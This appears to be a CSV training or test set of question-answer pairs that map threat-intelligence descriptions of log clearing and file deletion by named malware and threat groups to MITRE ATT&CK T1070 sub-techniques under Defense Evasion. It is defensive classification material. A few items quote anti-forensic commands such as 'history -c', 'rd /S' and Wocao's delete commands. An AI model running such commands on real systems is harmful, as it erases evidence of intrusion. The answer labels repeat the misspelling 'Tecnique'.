+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy has a module to clear event logs with PowerShell.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT contains code to clear event logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck clears event logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wevtutil can be used to clear system and security event logs from the system.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a command to clear system event logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT is able to wipe event logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has cleared log files within the /var/log/ folder.,"Tecnique: T1070.002 Indicator Removal: Clear Linux or Mac System Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has removed system logs from /var/log/syslog.,"Tecnique: T1070.002 Indicator Removal: Clear Linux or Mac System Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can clear possible malware traces such as application logs.,"Tecnique: T1070.002 Indicator Removal: Clear Linux or Mac System Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton removes logs from /var/logs and /Library/logs.,"Tecnique: T1070.002 Indicator Removal: Clear Linux or Mac System Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 attempted to remove evidence of some of its activity by deleting Bash histories.,"Tecnique: T1070.003 Indicator Removal: Clear Command History, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has cleared the command history on targeted ESXi servers.,"Tecnique: T1070.003 Indicator Removal: Clear Command History, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.","Tecnique: T1070.003 Indicator Removal: Clear Command History, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has removed mailbox export requests from compromised Exchange servers.,"Tecnique: T1070.003 Indicator Removal: Clear Command History, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has cleared command history with history -c.,"Tecnique: T1070.003 Indicator Removal: Clear Command History, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used Wevtutil to remove PowerShell execution logs.,"Tecnique: T1070.003 Indicator Removal: Clear Command History, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has used history -c to clear script shell logs.,"Tecnique: T1070.003 Indicator Removal: Clear Command History, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos can remove all command history on compromised hosts.,"Tecnique: T1070.003 Indicator Removal: Clear Command History, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, vba_macro.exe deletes itself after `FONTCACHE.DAT`, `rundll32.exe`, and the associated .lnk file is delivered.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors deleted `/tmp/test1.txt` on compromised Ivanti Connect Secure VPNs which was used to hold stolen configuration and cache files.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, the threat actors consistently removed traces of their activity by first overwriting a file using `/c cd /d c:\windows\temp\ & copy \\\c$\windows\system32\devmgr.dll \\\c$\windows\temp\LMAKSW.ps1 /y` and then deleting the overwritten file using `/c cd /d c:\windows\temp\ & del \\\c$\windows\temp\LMAKSW.ps1`.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 routinely removed their tools, including custom backdoors, once remote access was achieved.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 actors deleted tools and batch files from victim systems.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used SDelete to remove artifacts from victim networks.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's macOS backdoor can receive a “delete” command.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used malware to delete files after they are deployed on a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 deleted files from the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has deleted scripts and web shells to evade detection.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has deleted malicious executables from compromised machines.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The BRONZE BUTLER uploader or malware the uploader uses command to delete the RAR archives after they have been exfiltrated.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has performed file deletion to evade detection.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group deleted the DLL dropper from the victim’s machine to cover their tracks.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum has deleted files used during infection.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has used batch scripts and scheduled tasks to delete critical system files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 uses SDelete to clean up the environment and attempt to prevent detection.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has removed files from victim machines.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has deleted tmp and prefetch files during post compromise cleanup activities. FIN8 has also deleted PowerShell scripts to evade detection on compromised machines.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group tools can delete files used during an operation.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malware used by Group5 is capable of remotely deleting files from victims.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has deleted the exfiltrated data on disk after transmission. Kimsuky has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware has deleted files in various ways, including ""suicide scripts"" to delete malware binaries from the victim. Lazarus Group also uses secure file deletion to delete files from the victim.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has deleted and overwrote files to cover tracks.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has quickly deleted `cbd.exe` from a compromised host following the successful deployment of their malware.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda will delete their tools and files, and kill processes after their objectives are reached.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has deleted files associated with their payload after execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork removed certain files and replaced them so they could not be retrieved.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has deleted files on infected machines.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used backdoors that can delete files used in an attack from an infected system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used a payload that removes itself after running. TeamTNT also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The White Company has the ability to delete its malware entirely from the target system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has deleted dropper files on an infected system using command scripts.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has run `rd /S` to delete their working directories and files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A menuPass macro deletes files after it has decoded and decompressed them.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL can delete files and directories.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can self delete its dropper after the malware is successfully deployed.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has deleted the MSI file after installation.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can delete files from a compromised host after they are exfiltrated.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to delete files and directories on compromised hosts.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor’s plugin deletes the collected files and log files after exfiltration.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred can delete files from the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can delete files from victim machines.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH has the ability to delete PowerShell scripts from a compromised machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT can delete files and directories.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLACKCOFFEE has the capability to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has deleted itself and associated artifacts from victim machines.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can uninstall itself.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has cleaned up all files associated with the secondary payload execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has the ability to remove files and folders related to previous infections.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea contains a cleanup module that removes traces of itself from the victim.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has a command to delete a file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can delete its loader using a batch file in the Windows temporary folder.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal will delete its dropper and VBS scripts from the victim’s machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can uninstall its loader through the use of a `Sdl` command.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBAT has the ability to delete downloaded files from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER removes files from victim environments following use in multiple instances.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader has the ability to self delete.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto has the capability to use rm -rf to remove folders and files from the victim's machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak has a command to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can uninstall itself, including deleting its executable.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can delete created files from a compromised system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Recent versions of Cherry Picker delete files and registry keys created by the malware.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson has the ability to delete files from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cryptoistic has the ability delete files from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can use the command cmd.exe /c del to delete its artifacts from the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can delete its configuration file after installation.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has been observed deleting its original launcher after installation.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis has a command to delete files from the victim’s machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can delete specific files from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can remove its persistence and delete itself.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky can delete files it creates from the infected system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ECCENTRICBANDWAGON can delete log files generated from the malware stored at C:\windows\temp\tmp0207.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise is capable of launching a remote shell on the host to delete itself.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic has a command to delete a file from the machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has deleted the initial dropper after running through the environment checks.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux can uninstall its persistence mechanism and delete its configuration file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FALLCHILL can delete malware and associated artifacts from the victim.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT deletes the .LNK file from the startup directory as well as the dropper components.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can secure delete its DLL.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious can delete files from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy can execute batch scripts to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FruitFly will delete files on the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can delete files including its dropper component.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis has the ability to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer has commands to delete files and persistence mechanisms from the victim.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can delete its dropper component from the targeted system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon deletes one of its files, 2.hwp, from the endpoint after establishing persistence.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy's uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can delete .LNK files created in the Startup folder.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can delete the original executable after initial installation in addition to unused functions.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can delete old binaries on a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader can delete its executable from the AppData\Local\Temp directory on the compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HALFBAKED can delete a specified file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAWKBALL has the ability to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser deletes its original installer file once installation is complete.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has deleted files using the VBA kill function.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to overwrite its own file with random bites.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor has the ability to delete folders and files from a targeted system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor deletes its RAT installer file as it executes its DLL payload file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has deleted scripts after execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to clean up installed files, delete files, and delete itself from the victim’s machine.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro has the ability to delete a specified file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IceApple can delete files and directories from targeted systems.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has deleted files related to its dynamic debugger feature.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InnaputRAT has a command to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has deleted files and directories including XML and files successfully uploaded to C2 servers.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe has a command to delete a file from the machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
